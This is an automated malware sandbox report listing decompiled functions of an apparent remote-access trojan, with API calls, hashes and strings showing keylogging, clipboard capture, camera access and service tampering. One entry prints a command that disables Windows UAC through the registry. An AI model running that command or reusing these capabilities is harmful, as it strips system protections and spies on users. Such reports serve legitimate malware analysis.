                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __cftoe
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4189289331-0
                                                                                                                                                                                                                                            • Opcode ID: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                                                                                                                                                                                                            • Instruction ID: 51d3defa9bee42a6449c1cbae1767e96f335fc55d8793b788aa7c8c1dec457a3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9c401b065f3bfa052971b83b22631fc3acfeb1e9040e9a62fafe9f4e5745fff8
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE510A72900205ABFB249F598C81FAF77A9EFC9324F25421FF814A6291DB3DDD01866D
                                                                                                                                                                                                                                            Function 00403DE7 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 135sleepCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                                                                                                                                              • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prologSleep
                                                                                                                                                                                                                                            • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                                                                                                                                                            • API String ID: 3469354165-462540288
                                                                                                                                                                                                                                            • Opcode ID: a9f7d0d3fadaaa2ab5302d74800214878727d50abf2ff1e7d6e11163ed2cafe4
                                                                                                                                                                                                                                            • Instruction ID: a615deab89d52a04eef9df102bd8b4982dd8b49b1eab8c4ad016fc0191aaad38
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a9f7d0d3fadaaa2ab5302d74800214878727d50abf2ff1e7d6e11163ed2cafe4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E941A330A0420196CA14FB79C816AAD3A655B45704F00413FF809A73E2EF7C9A85C7CF
                                                                                                                                                                                                                                            Function 00419DFC Relevance: 9.1, APIs: 6, Instructions: 66serviceCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E0C
                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E20
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E2D
                                                                                                                                                                                                                                            • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419517), ref: 00419E62
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E74
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419517,00000000,00000000), ref: 00419E77
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 493672254-0
                                                                                                                                                                                                                                            • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                                                                                                                                                                                            • Instruction ID: 40159264159f5a90cd52f9b689d0e8cb5e0ea154c732c405bcbf7063391161e0
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09016D311083107AE3118B34EC1EFBF3B5CDB41B70F00023BF626922D1DA68CE8581A9
                                                                                                                                                                                                                                            Function 00437E16 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00437E0D,004377C1), ref: 00437E24
                                                                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E32
                                                                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E4B
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00437E0D,004377C1), ref: 00437E9D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                                                                            • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                                                                                                                                                                            • Instruction ID: 127a8aaeb23cc4eddae083ca6fcd73be4c6f1963697d6e79a1959115bdf772ac
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6701B57211D3159EE63427757C87A272B99EB0A779F20127FF228851E2EF2D4C41914C
                                                                                                                                                                                                                                            Function 00446ECF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00446F2E
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F3B
                                                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                            • _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3160817290-0
                                                                                                                                                                                                                                            • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                            • Instruction ID: 1b4467ed9408e6c3233579f8e1b56ac98d0768551ab8ff32c5b7efb0424b8365
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1F0F93560870027F61273797D46A6F15669BC37B6B26013FF909A2292EE2D8C06411F
                                                                                                                                                                                                                                            Function 00419C30 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C3F
                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C53
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C60
                                                                                                                                                                                                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C6F
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C81
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197AB,00000000,00000000), ref: 00419C84
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                                                                                                                            • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                                                                                                                                                                                                            • Instruction ID: 508c6a04514e5737773cd2f196b8466aacbf0489f3ca208dfe1df169d6e4b917
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93F0F6325403147BD3116B25EC89EFF3BACDB85BA1F000036F941921D2DB68CD4685F5
                                                                                                                                                                                                                                            Function 00419D32 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D41
                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D55
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D62
                                                                                                                                                                                                                                            • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D71
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D83
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419729,00000000,00000000), ref: 00419D86
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                                                                                                                            • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                                                                                                                                                                                                            • Instruction ID: e3947c2d1caeee04707242a29777fdfa1156a9fa4bc9e6dc5536219c00a7af20
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88F0C2325002146BD2116B25FC49EBF3AACDB85BA1B00003AFA06A21D2DB38CD4685F9
                                                                                                                                                                                                                                            Function 00419D97 Relevance: 9.0, APIs: 6, Instructions: 44serviceCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DA6
                                                                                                                                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DBA
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DC7
                                                                                                                                                                                                                                            • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DD6
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DE8
                                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004196A7,00000000,00000000), ref: 00419DEB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 221034970-0
                                                                                                                                                                                                                                            • Opcode ID: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                                                                                                                                                                                            • Instruction ID: 9f0c2abda8e07195e4bf0f321f31a82c7612ecaf5c8047990b3e76cea93c5393
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 578fdff71443f11c3fca357d736e88dc82f16117349863ef7b695c473245d396
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAF0C2325002146BD2116B24FC89EFF3AACDB85BA1B00003AFA05A21D2DB28CE4685F8
                                                                                                                                                                                                                                            Function 004129AA Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00412A1D
                                                                                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?,?,00000000,?,?,?,?), ref: 00412A4C
                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,?,?,00002710,?,?,?,00000000,?,?,?,?), ref: 00412AED
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Enum$InfoQueryValue
                                                                                                                                                                                                                                            • String ID: [regsplt]$DG
                                                                                                                                                                                                                                            • API String ID: 3554306468-1089238109
                                                                                                                                                                                                                                            • Opcode ID: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                                                                                                                                                            • Instruction ID: a28855c8467dc88eaaa14c2ad720c73ed52e1c745f0e0c0b8cf84a63aeea62c1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 420c64221c8be20a0884beaa9dc5826c3a8ed3ed3fba4086070cd80455fd0dc1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 99512E72108345AFD310EF61D995DEBB7ECEF84744F00493EB585D2191EB74EA088B6A
                                                                                                                                                                                                                                            Function 004559DA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 152COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                            • String ID: wKE
                                                                                                                                                                                                                                            • API String ID: 269201875-3150218262
                                                                                                                                                                                                                                            • Opcode ID: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                                                                                                                                                            • Instruction ID: 20fe87377ae66d6b83c96c89e5a9e0461ad99f2e5d6db859ec29947640f8945c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 396dac2f3812ff065a3283cc201ba07d86737f2a766ab43e7d660d85bd51e2e6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB412D31A00E005BEF24AAB94CD567F37A4EF05775F18031FFC1496293D67C8C05869A
                                                                                                                                                                                                                                            Function 0040AE58 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,00475B90,00475C10,?,0040179E,00475C10), ref: 00433534
                                                                                                                                                                                                                                              • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475C10), ref: 00433571
                                                                                                                                                                                                                                              • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040AEA7
                                                                                                                                                                                                                                              • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475C10,?,004017C1,00475C10,00000000), ref: 004334E9
                                                                                                                                                                                                                                              • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475C10,00000000), ref: 0043351C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit
                                                                                                                                                                                                                                            • String ID: [End of clipboard]$[Text copied to clipboard]$L]G$P]G
                                                                                                                                                                                                                                            • API String ID: 2974294136-4018440003
                                                                                                                                                                                                                                            • Opcode ID: 52feb45232d087000ab9dea4a82bd1c10224021308ca399c26d5e29f8a04d7c0
                                                                                                                                                                                                                                            • Instruction ID: f936e1d100a0b91fb3cd099947d4fcefdabc4258effb679c9043d151633dcd27
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52feb45232d087000ab9dea4a82bd1c10224021308ca399c26d5e29f8a04d7c0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF21B131A002158ACB14FB75D8969EE7374AF54318F50403FF902771E2EF386E5A8A8D
                                                                                                                                                                                                                                            Function 0040A876 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67timeCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                              • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: EventLocalTimewsprintf
                                                                                                                                                                                                                                            • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                                                                                                            • API String ID: 1497725170-248792730
                                                                                                                                                                                                                                            • Opcode ID: abe9d9f547bce7274006dd8b845fb0ff0597043dd99dd38add9522b7adedb076
                                                                                                                                                                                                                                            • Instruction ID: fc972a95d23854bc9b4bbea89c8e615d9b1bb69bfa4db415bad433d1ad0b57c3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: abe9d9f547bce7274006dd8b845fb0ff0597043dd99dd38add9522b7adedb076
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A118172400118AACB18FB56EC55CFE77B8AE48325F00013FF842620D1EF7C5A86C6E8
                                                                                                                                                                                                                                            Function 00409D97 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                                                                                                                                                            • Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                                                                                                            • String ID: `AG
                                                                                                                                                                                                                                            • API String ID: 1958988193-3058481221
                                                                                                                                                                                                                                            • Opcode ID: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                                                                                                                                                                                            • Instruction ID: 61dc848fc85204ea7fc5a67171cad01df1347b3512dd41eabc6ad436608203b4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7248f5b3272c1b8e158f3ed59b8642bc51f6090f2ebac6ec2a2f06e31ed32df
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A11C4303407406AE731E764E88962B7A9AAB91311F44057EF18562AE3D7389CD1829D
                                                                                                                                                                                                                                            Function 0041CA2F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegisterClassExA.USER32(00000030), ref: 0041CA7C
                                                                                                                                                                                                                                            • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA97
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0041CAA1
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                                                                                                            • String ID: 0$MsgWindowClass
                                                                                                                                                                                                                                            • API String ID: 2877667751-2410386613
                                                                                                                                                                                                                                            • Opcode ID: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                                                                                                                                            • Instruction ID: 4bfad48e3247df46523b3088673b608286a28c5fe91561ad906263ccd1e0ab35
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c0911dd88a02fcfaa539e9866612e91b1c0db8d522a7ddfb79423dd2815842ef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7501E5B1D1421DAB8B01DFEADCC49EFBBBDBE49295B50452AE415B2200E7708A458BA4
                                                                                                                                                                                                                                            Function 004069BA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42processCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00406A00
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A0F
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00406A14
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004069F6
                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe, xrefs: 004069FB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandle$CreateProcess
                                                                                                                                                                                                                                            • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            • API String ID: 2922976086-4183131282
                                                                                                                                                                                                                                            • Opcode ID: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                                                                            • Instruction ID: df89934bb1b0a8a8050eda01f74e4a29103dee5852f25f58c468be6e25eb4aa4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb4121427644dbe92f0faf5bfcaaefbe4213ddeedd11a12955cf8af7f240737c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22F090B69402ADBACB30ABD69C0EFCF7F3CEBC5B10F00042AB605A6051D6705144CAB8
                                                                                                                                                                                                                                            Function 004425E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044259A,?,?,0044253A,?), ref: 00442609
